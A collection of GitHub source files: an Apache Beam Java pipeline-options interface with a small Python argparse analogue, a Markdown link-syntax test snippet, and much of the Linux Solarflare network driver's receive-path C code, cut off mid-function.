* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.beam.sdk.options;
import com.google.auto.service.AutoService;
import org.apache.beam.sdk.annotations.Experimental;
import org.apache.beam.sdk.annotations.Experimental.Kind;
import org.apache.beam.vendor.guava.v26_0_jre.com.google.common.collect.ImmutableList;
/** Options that are used to control configuration of the remote environment. */
@Experimental(Kind.PORTABILITY)
@Hidden
public interface RemoteEnvironmentOptions extends PipelineOptions {
// The default should be null (no default), so that the environment can pick its suitable tmp
// directory when nothing is specified by the user
@Description("Local semi-persistent directory")
String getSemiPersistDir();
void setSemiPersistDir(String value);
/** Register the {@link RemoteEnvironmentOptions}. */
@AutoService(PipelineOptionsRegistrar.class)
class Options implements PipelineOptionsRegistrar {
@Override
public Iterable<Class<? extends PipelineOptions>> getPipelineOptions() {
return ImmutableList.of(RemoteEnvironmentOptions.class);
}
}
}
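The key design point above is that `getSemiPersistDir()` deliberately has no `@Default`, so an unset option stays `null` and the environment picks its own tmp directory. A hypothetical Python/argparse equivalent of that option surface — illustrative only, not Beam's API:

```python
import argparse

def parse_remote_environment_options(argv):
    # No default for --semi_persist_dir: when the flag is absent the value
    # stays None, and the environment chooses a suitable tmp directory itself.
    parser = argparse.ArgumentParser()
    parser.add_argument('--semi_persist_dir', default=None,
                        help='Local semi-persistent directory')
    # parse_known_args mirrors how pipeline options tolerate unrelated flags.
    options, _unknown = parser.parse_known_args(argv)
    return options
```

Leaving the default unset (rather than baking in e.g. `/tmp`) keeps the decision with the runtime environment, as the comment in the interface explains.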
| {
"pile_set_name": "Github"
} |
Alternative delimiters for [link definitions][link1] are allowed -- as of
Markdown 1.0.2, I think. Hence, [this link][link2] and [this link][link3] work
too.
[link1]: http://daringfireball.net/projects/markdown/syntax#link "link syntax"
[link2]: http://daringfireball.net/projects/markdown/syntax#link 'link syntax'
[link3]: http://daringfireball.net/projects/markdown/syntax#link (link syntax)
| {
"pile_set_name": "Github"
} |
/****************************************************************************
* Driver for Solarflare network controllers and boards
* Copyright 2005-2006 Fen Systems Ltd.
* Copyright 2005-2013 Solarflare Communications Inc.
*
* This program is free software; you can redistribute it and/or modify it
* under the terms of the GNU General Public License version 2 as published
* by the Free Software Foundation, incorporated herein by reference.
*/
#include <linux/socket.h>
#include <linux/in.h>
#include <linux/slab.h>
#include <linux/ip.h>
#include <linux/ipv6.h>
#include <linux/tcp.h>
#include <linux/udp.h>
#include <linux/prefetch.h>
#include <linux/moduleparam.h>
#include <linux/iommu.h>
#include <net/ip.h>
#include <net/checksum.h>
#include "net_driver.h"
#include "efx.h"
#include "filter.h"
#include "nic.h"
#include "selftest.h"
#include "workarounds.h"
/* Preferred number of descriptors to fill at once */
#define EFX_RX_PREFERRED_BATCH 8U
/* Number of RX buffers to recycle pages for. When creating the RX page recycle
* ring, this number is divided by the number of buffers per page to calculate
* the number of pages to store in the RX page recycle ring.
*/
#define EFX_RECYCLE_RING_SIZE_IOMMU 4096
#define EFX_RECYCLE_RING_SIZE_NOIOMMU (2 * EFX_RX_PREFERRED_BATCH)
/* Size of buffer allocated for skb header area. */
#define EFX_SKB_HEADERS 128u
/* This is the percentage fill level below which new RX descriptors
* will be added to the RX descriptor ring.
*/
static unsigned int rx_refill_threshold;
/* Each packet can consume up to ceil(max_frame_len / buffer_size) buffers */
#define EFX_RX_MAX_FRAGS DIV_ROUND_UP(EFX_MAX_FRAME_LEN(EFX_MAX_MTU), \
EFX_RX_USR_BUF_SIZE)
/*
* RX maximum head room required.
*
* This must be at least 1 to prevent overflow, plus one packet-worth
* to allow pipelined receives.
*/
#define EFX_RXD_HEAD_ROOM (1 + EFX_RX_MAX_FRAGS)
static inline u8 *efx_rx_buf_va(struct efx_rx_buffer *buf)
{
return page_address(buf->page) + buf->page_offset;
}
static inline u32 efx_rx_buf_hash(struct efx_nic *efx, const u8 *eh)
{
#if defined(CONFIG_HAVE_EFFICIENT_UNALIGNED_ACCESS)
return __le32_to_cpup((const __le32 *)(eh + efx->rx_packet_hash_offset));
#else
const u8 *data = eh + efx->rx_packet_hash_offset;
return (u32)data[0] |
(u32)data[1] << 8 |
(u32)data[2] << 16 |
(u32)data[3] << 24;
#endif
}
static inline struct efx_rx_buffer *
efx_rx_buf_next(struct efx_rx_queue *rx_queue, struct efx_rx_buffer *rx_buf)
{
if (unlikely(rx_buf == efx_rx_buffer(rx_queue, rx_queue->ptr_mask)))
return efx_rx_buffer(rx_queue, 0);
else
return rx_buf + 1;
}
static inline void efx_sync_rx_buffer(struct efx_nic *efx,
struct efx_rx_buffer *rx_buf,
unsigned int len)
{
dma_sync_single_for_cpu(&efx->pci_dev->dev, rx_buf->dma_addr, len,
DMA_FROM_DEVICE);
}
void efx_rx_config_page_split(struct efx_nic *efx)
{
efx->rx_page_buf_step = ALIGN(efx->rx_dma_len + efx->rx_ip_align,
EFX_RX_BUF_ALIGNMENT);
efx->rx_bufs_per_page = efx->rx_buffer_order ? 1 :
((PAGE_SIZE - sizeof(struct efx_rx_page_state)) /
efx->rx_page_buf_step);
efx->rx_buffer_truesize = (PAGE_SIZE << efx->rx_buffer_order) /
efx->rx_bufs_per_page;
efx->rx_pages_per_batch = DIV_ROUND_UP(EFX_RX_PREFERRED_BATCH,
efx->rx_bufs_per_page);
}
/* Check the RX page recycle ring for a page that can be reused. */
static struct page *efx_reuse_page(struct efx_rx_queue *rx_queue)
{
struct efx_nic *efx = rx_queue->efx;
struct page *page;
struct efx_rx_page_state *state;
unsigned index;
index = rx_queue->page_remove & rx_queue->page_ptr_mask;
page = rx_queue->page_ring[index];
if (page == NULL)
return NULL;
rx_queue->page_ring[index] = NULL;
/* page_remove cannot exceed page_add. */
if (rx_queue->page_remove != rx_queue->page_add)
++rx_queue->page_remove;
/* If page_count is 1 then we hold the only reference to this page. */
if (page_count(page) == 1) {
++rx_queue->page_recycle_count;
return page;
} else {
state = page_address(page);
dma_unmap_page(&efx->pci_dev->dev, state->dma_addr,
PAGE_SIZE << efx->rx_buffer_order,
DMA_FROM_DEVICE);
put_page(page);
++rx_queue->page_recycle_failed;
}
return NULL;
}
/**
 * efx_init_rx_buffers - create EFX_RX_BATCH page-based RX buffers
 *
 * @rx_queue: Efx RX queue
 * @atomic: control memory allocation flags
 *
 * This allocates a batch of pages, maps them for DMA, and populates
 * struct efx_rx_buffers for each one. Return a negative error code or
 * 0 on success. If a single page can be used for multiple buffers,
 * then the page will either be inserted fully, or not at all.
 */
static int efx_init_rx_buffers(struct efx_rx_queue *rx_queue, bool atomic)
{
struct efx_nic *efx = rx_queue->efx;
struct efx_rx_buffer *rx_buf;
struct page *page;
unsigned int page_offset;
struct efx_rx_page_state *state;
dma_addr_t dma_addr;
unsigned index, count;
count = 0;
do {
page = efx_reuse_page(rx_queue);
if (page == NULL) {
page = alloc_pages(__GFP_COLD | __GFP_COMP |
(atomic ? GFP_ATOMIC : GFP_KERNEL),
efx->rx_buffer_order);
if (unlikely(page == NULL))
return -ENOMEM;
dma_addr =
dma_map_page(&efx->pci_dev->dev, page, 0,
PAGE_SIZE << efx->rx_buffer_order,
DMA_FROM_DEVICE);
if (unlikely(dma_mapping_error(&efx->pci_dev->dev,
dma_addr))) {
__free_pages(page, efx->rx_buffer_order);
return -EIO;
}
state = page_address(page);
state->dma_addr = dma_addr;
} else {
state = page_address(page);
dma_addr = state->dma_addr;
}
dma_addr += sizeof(struct efx_rx_page_state);
page_offset = sizeof(struct efx_rx_page_state);
do {
index = rx_queue->added_count & rx_queue->ptr_mask;
rx_buf = efx_rx_buffer(rx_queue, index);
rx_buf->dma_addr = dma_addr + efx->rx_ip_align;
rx_buf->page = page;
rx_buf->page_offset = page_offset + efx->rx_ip_align;
rx_buf->len = efx->rx_dma_len;
rx_buf->flags = 0;
++rx_queue->added_count;
get_page(page);
dma_addr += efx->rx_page_buf_step;
page_offset += efx->rx_page_buf_step;
} while (page_offset + efx->rx_page_buf_step <= PAGE_SIZE);
rx_buf->flags = EFX_RX_BUF_LAST_IN_PAGE;
} while (++count < efx->rx_pages_per_batch);
return 0;
}
/* Unmap a DMA-mapped page. This function is only called for the final RX
* buffer in a page.
*/
static void efx_unmap_rx_buffer(struct efx_nic *efx,
struct efx_rx_buffer *rx_buf)
{
struct page *page = rx_buf->page;
if (page) {
struct efx_rx_page_state *state = page_address(page);
dma_unmap_page(&efx->pci_dev->dev,
state->dma_addr,
PAGE_SIZE << efx->rx_buffer_order,
DMA_FROM_DEVICE);
}
}
static void efx_free_rx_buffers(struct efx_rx_queue *rx_queue,
struct efx_rx_buffer *rx_buf,
unsigned int num_bufs)
{
do {
if (rx_buf->page) {
put_page(rx_buf->page);
rx_buf->page = NULL;
}
rx_buf = efx_rx_buf_next(rx_queue, rx_buf);
} while (--num_bufs);
}
/* Attempt to recycle the page if there is an RX recycle ring; the page can
* only be added if this is the final RX buffer, to prevent pages being used in
* the descriptor ring and appearing in the recycle ring simultaneously.
*/
static void efx_recycle_rx_page(struct efx_channel *channel,
struct efx_rx_buffer *rx_buf)
{
struct page *page = rx_buf->page;
struct efx_rx_queue *rx_queue = efx_channel_get_rx_queue(channel);
struct efx_nic *efx = rx_queue->efx;
unsigned index;
/* Only recycle the page after processing the final buffer. */
if (!(rx_buf->flags & EFX_RX_BUF_LAST_IN_PAGE))
return;
index = rx_queue->page_add & rx_queue->page_ptr_mask;
if (rx_queue->page_ring[index] == NULL) {
unsigned read_index = rx_queue->page_remove &
rx_queue->page_ptr_mask;
/* The next slot in the recycle ring is available, but
* increment page_remove if the read pointer currently
* points here.
*/
if (read_index == index)
++rx_queue->page_remove;
rx_queue->page_ring[index] = page;
++rx_queue->page_add;
return;
}
++rx_queue->page_recycle_full;
efx_unmap_rx_buffer(efx, rx_buf);
put_page(rx_buf->page);
}
static void efx_fini_rx_buffer(struct efx_rx_queue *rx_queue,
struct efx_rx_buffer *rx_buf)
{
/* Release the page reference we hold for the buffer. */
if (rx_buf->page)
put_page(rx_buf->page);
/* If this is the last buffer in a page, unmap and free it. */
if (rx_buf->flags & EFX_RX_BUF_LAST_IN_PAGE) {
efx_unmap_rx_buffer(rx_queue->efx, rx_buf);
efx_free_rx_buffers(rx_queue, rx_buf, 1);
}
rx_buf->page = NULL;
}
/* Recycle the pages that are used by buffers that have just been received. */
static void efx_recycle_rx_pages(struct efx_channel *channel,
struct efx_rx_buffer *rx_buf,
unsigned int n_frags)
{
struct efx_rx_queue *rx_queue = efx_channel_get_rx_queue(channel);
do {
efx_recycle_rx_page(channel, rx_buf);
rx_buf = efx_rx_buf_next(rx_queue, rx_buf);
} while (--n_frags);
}
static void efx_discard_rx_packet(struct efx_channel *channel,
struct efx_rx_buffer *rx_buf,
unsigned int n_frags)
{
struct efx_rx_queue *rx_queue = efx_channel_get_rx_queue(channel);
efx_recycle_rx_pages(channel, rx_buf, n_frags);
efx_free_rx_buffers(rx_queue, rx_buf, n_frags);
}
/**
* efx_fast_push_rx_descriptors - push new RX descriptors quickly
* @rx_queue: RX descriptor queue
*
* This will aim to fill the RX descriptor queue up to
* @rx_queue->@max_fill. If there is insufficient atomic
* memory to do so, a slow fill will be scheduled.
*
 * The caller must provide serialisation (none is used here). In practice,
* this means this function must run from the NAPI handler, or be called
* when NAPI is disabled.
*/
void efx_fast_push_rx_descriptors(struct efx_rx_queue *rx_queue, bool atomic)
{
struct efx_nic *efx = rx_queue->efx;
unsigned int fill_level, batch_size;
int space, rc = 0;
if (!rx_queue->refill_enabled)
return;
/* Calculate current fill level, and exit if we don't need to fill */
fill_level = (rx_queue->added_count - rx_queue->removed_count);
EFX_WARN_ON_ONCE_PARANOID(fill_level > rx_queue->efx->rxq_entries);
if (fill_level >= rx_queue->fast_fill_trigger)
goto out;
/* Record minimum fill level */
if (unlikely(fill_level < rx_queue->min_fill)) {
if (fill_level)
rx_queue->min_fill = fill_level;
}
batch_size = efx->rx_pages_per_batch * efx->rx_bufs_per_page;
space = rx_queue->max_fill - fill_level;
EFX_WARN_ON_ONCE_PARANOID(space < batch_size);
netif_vdbg(rx_queue->efx, rx_status, rx_queue->efx->net_dev,
"RX queue %d fast-filling descriptor ring from"
" level %d to level %d\n",
efx_rx_queue_index(rx_queue), fill_level,
rx_queue->max_fill);
do {
rc = efx_init_rx_buffers(rx_queue, atomic);
if (unlikely(rc)) {
/* Ensure that we don't leave the rx queue empty */
if (rx_queue->added_count == rx_queue->removed_count)
efx_schedule_slow_fill(rx_queue);
goto out;
}
} while ((space -= batch_size) >= batch_size);
netif_vdbg(rx_queue->efx, rx_status, rx_queue->efx->net_dev,
"RX queue %d fast-filled descriptor ring "
"to level %d\n", efx_rx_queue_index(rx_queue),
rx_queue->added_count - rx_queue->removed_count);
out:
if (rx_queue->notified_count != rx_queue->added_count)
efx_nic_notify_rx_desc(rx_queue);
}
void efx_rx_slow_fill(unsigned long context)
{
struct efx_rx_queue *rx_queue = (struct efx_rx_queue *)context;
/* Post an event to cause NAPI to run and refill the queue */
efx_nic_generate_fill_event(rx_queue);
++rx_queue->slow_fill_count;
}
static void efx_rx_packet__check_len(struct efx_rx_queue *rx_queue,
struct efx_rx_buffer *rx_buf,
int len)
{
struct efx_nic *efx = rx_queue->efx;
unsigned max_len = rx_buf->len - efx->type->rx_buffer_padding;
if (likely(len <= max_len))
return;
/* The packet must be discarded, but this is only a fatal error
* if the caller indicated it was
*/
rx_buf->flags |= EFX_RX_PKT_DISCARD;
if (net_ratelimit())
netif_err(efx, rx_err, efx->net_dev,
"RX queue %d overlength RX event (%#x > %#x)\n",
efx_rx_queue_index(rx_queue), len, max_len);
efx_rx_queue_channel(rx_queue)->n_rx_overlength++;
}
/* Pass a received packet up through GRO. GRO can handle pages
* regardless of checksum state and skbs with a good checksum.
*/
static void
efx_rx_packet_gro(struct efx_channel *channel, struct efx_rx_buffer *rx_buf,
unsigned int n_frags, u8 *eh)
{
struct napi_struct *napi = &channel->napi_str;
gro_result_t gro_result;
struct efx_nic *efx = channel->efx;
struct sk_buff *skb;
skb = napi_get_frags(napi);
if (unlikely(!skb)) {
struct efx_rx_queue *rx_queue;
rx_queue = efx_channel_get_rx_queue(channel);
efx_free_rx_buffers(rx_queue, rx_buf, n_frags);
return;
}
if (efx->net_dev->features & NETIF_F_RXHASH)
skb_set_hash(skb, efx_rx_buf_hash(efx, eh),
PKT_HASH_TYPE_L3);
skb->ip_summed = ((rx_buf->flags & EFX_RX_PKT_CSUMMED) ?
CHECKSUM_UNNECESSARY : CHECKSUM_NONE);
skb->csum_level = !!(rx_buf->flags & EFX_RX_PKT_CSUM_LEVEL);
for (;;) {
skb_fill_page_desc(skb, skb_shinfo(skb)->nr_frags,
rx_buf->page, rx_buf->page_offset,
rx_buf->len);
rx_buf->page = NULL;
skb->len += rx_buf->len;
if (skb_shinfo(skb)->nr_frags == n_frags)
break;
rx_buf = efx_rx_buf_next(&channel->rx_queue, rx_buf);
}
skb->data_len = skb->len;
skb->truesize += n_frags * efx->rx_buffer_truesize;
skb_record_rx_queue(skb, channel->rx_queue.core_index);
gro_result = napi_gro_frags(napi);
if (gro_result != GRO_DROP)
channel->irq_mod_score += 2;
}
/* Allocate and construct an SKB around page fragments */
static struct sk_buff *efx_rx_mk_skb(struct efx_channel *channel,
struct efx_rx_buffer *rx_buf,
unsigned int n_frags,
u8 *eh, int hdr_len)
{
struct efx_nic *efx = channel->efx;
struct sk_buff *skb;
/* Allocate an SKB to store the headers */
skb = netdev_alloc_skb(efx->net_dev,
efx->rx_ip_align + efx->rx_prefix_size +
hdr_len);
if (unlikely(skb == NULL)) {
atomic_inc(&efx->n_rx_noskb_drops);
return NULL;
}
EFX_WARN_ON_ONCE_PARANOID(rx_buf->len < hdr_len);
memcpy(skb->data + efx->rx_ip_align, eh - efx->rx_prefix_size,
efx->rx_prefix_size + hdr_len);
skb_reserve(skb, efx->rx_ip_align + efx->rx_prefix_size);
__skb_put(skb, hdr_len);
/* Append the remaining page(s) onto the frag list */
if (rx_buf->len > hdr_len) {
rx_buf->page_offset += hdr_len;
rx_buf->len -= hdr_len;
for (;;) {
skb_fill_page_desc(skb, skb_shinfo(skb)->nr_frags,
rx_buf->page, rx_buf->page_offset,
rx_buf->len);
rx_buf->page = NULL;
skb->len += rx_buf->len;
skb->data_len += rx_buf->len;
if (skb_shinfo(skb)->nr_frags == n_frags)
break;
rx_buf = efx_rx_buf_next(&channel->rx_queue, rx_buf);
}
} else {
__free_pages(rx_buf->page, efx->rx_buffer_order);
rx_buf->page = NULL;
n_frags = 0;
}
skb->truesize += n_frags * efx->rx_buffer_truesize;
/* Move past the ethernet header */
skb->protocol = eth_type_trans(skb, efx->net_dev);
skb_mark_napi_id(skb, &channel->napi_str);
return skb;
}
void efx_rx_packet(struct efx_rx_queue *rx_queue, unsigned int index,
unsigned int n_frags, unsigned int len, u16 flags)
{
struct efx_nic *efx = rx_queue->efx;
struct efx_channel *channel = efx_rx_queue_channel(rx_queue);
struct efx_rx_buffer *rx_buf;
rx_queue->rx_packets++;
rx_buf = efx_rx_buffer(rx_queue, index);
rx_buf->flags |= flags;
/* Validate the number of fragments and completed length */
if (n_frags == 1) {
if (!(flags & EFX_RX_PKT_PREFIX_LEN))
efx_rx_packet__check_len(rx_queue, rx_buf, len);
} else if (unlikely(n_frags > EFX_RX_MAX_FRAGS) ||
unlikely(len <= (n_frags - 1) * efx->rx_dma_len) ||
unlikely(len > n_frags * efx->rx_dma_len) ||
unlikely(!efx->rx_scatter)) {
/* If this isn't an explicit discard request, either
* the hardware or the driver is broken.
*/
WARN_ON(!(len == 0 && rx_buf->flags & EFX_RX_PKT_DISCARD));
rx_buf->flags |= EFX_RX_PKT_DISCARD;
}
netif_vdbg(efx, rx_status, efx->net_dev,
"RX queue %d received ids %x-%x len %d %s%s\n",
efx_rx_queue_index(rx_queue), index,
(index + n_frags - 1) & rx_queue->ptr_mask, len,
(rx_buf->flags & EFX_RX_PKT_CSUMMED) ? " [SUMMED]" : "",
(rx_buf->flags & EFX_RX_PKT_DISCARD) ? " [DISCARD]" : "");
/* Discard packet, if instructed to do so. Process the
* previous receive first.
*/
if (unlikely(rx_buf->flags & EFX_RX_PKT_DISCARD)) {
efx_rx_flush_packet(channel);
efx_discard_rx_packet(channel, rx_buf, n_frags);
return;
}
if (n_frags == 1 && !(flags & EFX_RX_PKT_PREFIX_LEN))
rx_buf->len = len;
/* Release and/or sync the DMA mapping - assumes all RX buffers
* consumed in-order per RX queue.
*/
efx_sync_rx_buffer(efx, rx_buf, rx_buf->len);
/* Prefetch nice and early so data will (hopefully) be in cache by
* the time we look at it.
*/
prefetch(efx_rx_buf_va(rx_buf));
rx_buf->page_offset += efx->rx_prefix_size;
rx_buf->len -= efx->rx_prefix_size;
if (n_frags > 1) {
/* Release/sync DMA mapping for additional fragments.
* Fix length for last fragment.
*/
unsigned int tail_frags = n_frags - 1;
for (;;) {
rx_buf = efx_rx_buf_next(rx_queue, rx_buf);
if (--tail_frags == 0)
break;
efx_sync_rx_buffer(efx, rx_buf, efx->rx_dma_len);
}
rx_buf->len = len - (n_frags - 1) * efx->rx_dma_len;
efx_sync_rx_buffer(efx, rx_buf, rx_buf->len);
}
/* All fragments have been DMA-synced, so recycle pages. */
rx_buf = efx_rx_buffer(rx_queue, index);
efx_recycle_rx_pages(channel, rx_buf, n_frags);
/* Pipeline receives so that we give time for packet headers to be
* prefetched into cache.
*/
efx_rx_flush_packet(channel);
channel->rx_pkt_n_frags = n_frags;
channel->rx_pkt_index = index;
}
static void efx_rx_deliver(struct efx_channel *channel, u8 *eh,
struct efx_rx_buffer *rx_buf,
unsigned int n_frags)
{
struct sk_buff *skb;
u16 hdr_len = min_t(u16, rx_buf->len, EFX_SKB_HEADERS);
skb = efx_rx_mk_skb(channel, rx_buf, n_frags, eh, hdr_len);
if (unlikely(skb == NULL)) {
struct efx_rx_queue *rx_queue;
rx_queue = efx_channel_get_rx_queue(channel);
efx_free_rx_buffers(rx_queue, rx_buf, n_frags);
return;
}
skb_record_rx_queue(skb, channel->rx_queue.core_index);
/* Set the SKB flags */
skb_checksum_none_assert(skb);
if (likely(rx_buf->flags & EFX_RX_PKT_CSUMMED)) {
skb->ip_summed = CHECKSUM_UNNECESSARY;
skb->csum_level = !!(rx_buf->flags & EFX_RX_PKT_CSUM_LEVEL);
}
efx_rx_skb_attach_timestamp(channel, skb);
if (channel->type->receive_skb)
if (channel->type->receive_skb(channel, skb))
return;
/* Pass the packet up */
netif_receive_skb(skb);
}
/* Handle a received packet. Second half: Touches packet payload. */
void __efx_rx_packet(struct efx_channel *channel)
{
struct efx_nic *efx = channel->efx;
struct efx_rx_buffer *rx_buf =
efx_rx_buffer(&channel->rx_queue, channel->rx_pkt_index);
u8 *eh = efx_rx_buf_va(rx_buf);
/* Read length from the prefix if necessary. This already
* excludes the length of the prefix itself.
*/
if (rx_buf->flags & EFX_RX_PKT_PREFIX_LEN)
rx_buf->len = le16_to_cpup((__le16 *)
(eh + efx->rx_packet_len_offset));
/* If we're in loopback test, then pass the packet directly to the
* loopback layer, and free the rx_buf here
*/
if (unlikely(efx->loopback_selftest)) {
struct efx_rx_queue *rx_queue;
efx_loopback_rx_packet(efx, eh, rx_buf->len);
rx_queue = efx_channel_get_rx_queue(channel);
efx_free_rx_buffers(rx_queue, rx_buf,
channel->rx_pkt_n_frags);
goto out;
}
if (unlikely(!(efx->net_dev->features & NETIF_F_RXCSUM)))
rx_buf->flags &= ~EFX_RX_PKT_CSUMMED;
if ((rx_buf->flags & EFX_RX_PKT_TCP) && !channel->type->receive_skb)
efx_rx_packet_gro(channel, rx_buf, channel->rx_pkt_n_frags, eh);
else
efx_rx_deliver(channel, eh, rx_buf, channel->rx_pkt_n_frags);
out:
channel->rx_pkt_n_frags = 0;
}
int efx_probe_rx_queue(struct efx_rx_queue *rx_queue)
{
struct efx_nic *efx = rx_queue->efx;
unsigned int entries;
int rc;
/* Create the smallest power-of-two aligned ring */
entries = max(roundup_pow_of_two(efx->rxq_entries), EFX_MIN_DMAQ_SIZE);
EFX_WARN_ON_PARANOID(entries > EFX_MAX_DMAQ_SIZE);
rx_queue->ptr_mask = entries - 1;
netif_dbg(efx, probe, efx->net_dev,
"creating RX queue %d size %#x mask %#x\n",
efx_rx_queue_index(rx_queue), efx->rxq_entries,
rx_queue->ptr_mask);
/* Allocate RX buffers */
rx_queue->buffer = kcalloc(entries, sizeof(*rx_queue->buffer),
GFP_KERNEL);
if (!rx_queue->buffer)
return -ENOMEM;
rc = efx_nic_probe_rx(rx_queue);
if (rc) {
kfree(rx_queue->buffer);
rx_queue->buffer = NULL;
}
return rc;
}
static void efx_init_rx_recycle_ring(struct efx_nic *efx,
struct efx_rx_queue *rx_queue)
{
unsigned int bufs_in_recycle_ring, page_ring_size;
/* Set the RX recycle ring size */
#ifdef CONFIG_PPC64
bufs_in_recycle_ring = EFX_RECYCLE_RING_SIZE_IOMMU;
#else
if (iommu_present(&pci_bus_type))
bufs_in_recycle_ring = EFX_RECYCLE_RING_SIZE_IOMMU;
else
bufs_in_recycle_ring = EFX_RECYCLE_RING_SIZE_NOIOMMU;
#endif /* CONFIG_PPC64 */
page_ring_size = roundup_pow_of_two(bufs_in_recycle_ring /
efx->rx_bufs_per_page);
rx_queue->page_ring = kcalloc(page_ring_size,
sizeof(*rx_queue->page_ring), GFP_KERNEL);
rx_queue->page_ptr_mask = page_ring_size - 1;
}
void efx_init_rx_queue(struct efx_rx_queue *rx_queue)
{
struct efx_nic *efx = rx_queue->efx;
unsigned int max_fill, trigger, max_trigger;
netif_dbg(rx_queue->efx, drv, rx_queue->efx->net_dev,
"initialising RX queue %d\n", efx_rx_queue_index(rx_queue));
/* Initialise ptr fields */
rx_queue->added_count = 0;
rx_queue->notified_count = 0;
rx_queue->removed_count = 0;
rx_queue->min_fill = -1U;
efx_init_rx_recycle_ring(efx, rx_queue);
rx_queue->page_remove = 0;
rx_queue->page_add = rx_queue->page_ptr_mask + 1;
rx_queue->page_recycle_count = 0;
rx_queue->page_recycle_failed = 0;
rx_queue->page_recycle_full = 0;
/* Initialise limit fields */
max_fill = efx->rxq_entries - EFX_RXD_HEAD_ROOM;
max_trigger =
max_fill - efx->rx_pages_per_batch * efx->rx_bufs_per_page;
if (rx_refill_threshold != 0) {
trigger = max_fill * min(rx_refill_threshold, 100U) / 100U;
if (trigger > max_trigger)
trigger = max_trigger;
} else {
trigger = max_trigger;
}
rx_queue->max_fill = max_fill;
rx_queue->fast_fill_trigger = trigger;
rx_queue->refill_enabled = true;
/* Set up RX descriptor ring */
efx_nic_init_rx(rx_queue);
}
void efx_fini_rx_queue(struct efx_rx_queue *rx_queue)
{
int i;
struct efx_nic *efx = rx_queue->efx;
struct efx_rx_buffer *rx_buf;
netif_dbg(rx_queue->efx, drv, rx_queue->efx->net_dev,
"shutting down RX queue %d\n", efx_rx_queue_index(rx_queue));
del_timer_sync(&rx_queue->slow_fill);
/* Release RX buffers from the current read ptr to the write ptr */
if (rx_queue->buffer) {
for (i = rx_queue->removed_count; i < rx_queue->added_count;
i++) {
unsigned index = i & rx_queue->ptr_mask;
rx_buf = efx_rx_buffer(rx_queue, index);
efx_fini_rx_buffer(rx_queue, rx_buf);
}
}
/* Unmap and release the pages in the recycle ring. Remove the ring. */
for (i = 0; i <= rx_queue->page_ptr_mask; i++) {
struct page *page = rx_queue->page_ring[i];
struct efx_rx_page_state *state;
if (page == NULL)
continue;
state = page_address(page);
dma_unmap_page(&efx->pci_dev->dev, state->dma_addr,
PAGE_SIZE << efx->rx_buffer_order,
DMA_FROM_DEVICE);
put_page(page);
}
kfree(rx_queue->page_ring);
rx_queue->page_ring = NULL;
}
void efx_remove_rx_queue(struct efx_rx_queue *rx_queue)
{
netif_dbg(rx_queue->efx, drv, rx_queue->efx->net_dev,
"destroying RX queue %d\n", efx_rx_queue_index(rx_queue));
efx_nic_remove_rx(rx_queue);
kfree(rx_queue->buffer);
rx_queue->buffer = NULL;
}
module_param(rx_refill_threshold, uint, 0444);
MODULE_PARM_DESC(rx_refill_threshold,
"RX descriptor ring refill threshold (%)");
#ifdef CONFIG_RFS_ACCEL
int efx_filter_rfs(struct net_device *net_dev, const struct sk_buff *skb,
u16 rxq_index, u32 flow_id)
{
struct efx_nic *efx = netdev_priv(net_dev);
struct efx_channel *channel;
struct efx_filter_spec spec;
struct flow_keys fk;
int rc;
if (flow_id == RPS_FLOW_ID_INVALID)
return -EINVAL;
if (!skb_flow_dissect_flow_keys(skb, &fk, 0))
return -EPROTONOSUPPORT;
if (fk.basic.n_proto != htons(ETH_P_IP) && fk.basic.n_proto != htons(ETH_P_IPV6))
return -EPROTONOSUPPORT;
if (fk.control.flags & FLOW_DIS_IS_FRAGMENT)
return -EPROTONOSUPPORT;
efx_filter_init_rx(&spec, EFX_FILTER_PRI_HINT,
efx->rx_scatter ? EFX_FILTER_FLAG_RX_SCATTER : 0,
rxq_index);
spec.match_flags =
EFX_FILTER_MATCH_ETHER_TYPE | EFX_FILTER_MATCH_IP_PROTO |
EFX_FILTER_MATCH_LOC_HOST | EFX_FILTER_MATCH_LOC_PORT |
EFX_FILTER_MATCH_REM_HOST | EFX_FILTER_MATCH_REM_PORT;
spec.ether_type = fk.basic.n_proto;
spec.ip_proto = fk.basic.ip_proto;
if (fk.basic.n_proto == htons(ETH_P_IP)) {
spec.rem_host[0] = fk.addrs.v4addrs.src;
spec.loc_host[0] = fk.addrs.v4addrs.dst;
} else {
memcpy(spec.rem_host, &fk.addrs.v6addrs.src, sizeof(struct in6_addr));
memcpy(spec.loc_host, &fk.addrs.v6addrs.dst, sizeof(struct in6_addr));
}
spec.rem_port = fk.ports.src;
spec.loc_port = fk.ports.dst;
rc = efx->type->filter_rfs_insert(efx, &spec);
if (rc < 0)
return rc;
/* Remember this so we can check whether to expire the filter later */
channel = efx_get_channel(efx, rxq_index);
channel->rps_flow_id[rc] = flow_id;
++channel->rfs_filters_added;
if (spec.ether_type == htons(ETH_P_IP))
netif_info(efx, rx_status, efx->net_dev,
"steering %s %pI4:%u:%pI4:%u to queue %u [flow %u filter %d]\n",
(spec.ip_proto == IPPROTO_TCP) ? "TCP" : "UDP",
spec.rem_host, ntohs(spec.rem_port), spec.loc_host,
ntohs(spec.loc_port), rxq_index, flow_id, rc);
else
netif_info(efx, rx_status, efx->net_dev,
"steering %s [%pI6]:%u:[%pI6]:%u to queue %u [flow %u filter %d]\n",
(spec.ip_proto == IPPROTO_TCP) ? "TCP" : "UDP",
spec.rem_host, ntohs(spec.rem_port), spec.loc_host,
ntohs(spec.loc_port), rxq_index, flow_id, rc);
return rc;
}
bool __efx_filter_rfs_expire(struct efx_nic *efx, unsigned int quota)
{
bool (*expire_one)(struct efx_nic *efx, u32 flow_id, unsigned int index);
unsigned int channel_idx, index, size;
u32 flow_id;
if (!spin_trylock_bh(&efx->filter_lock))
return false;
expire_one = efx->type->filter_rfs_expire_one;
channel_idx = efx->rps_expire_channel;
index = efx->rps_expire_index;
size = efx->type->max_rx_ip_filters;
while (quota--) {
struct efx_channel *channel = efx_get_channel(efx, channel_idx);
flow_id = channel->rps_flow_id[index];
if (flow_id != RPS_FLOW_ID_INVALID &&
expire_one(efx, flow_id, index)) {
netif_info(efx, rx_status, efx->net_dev,
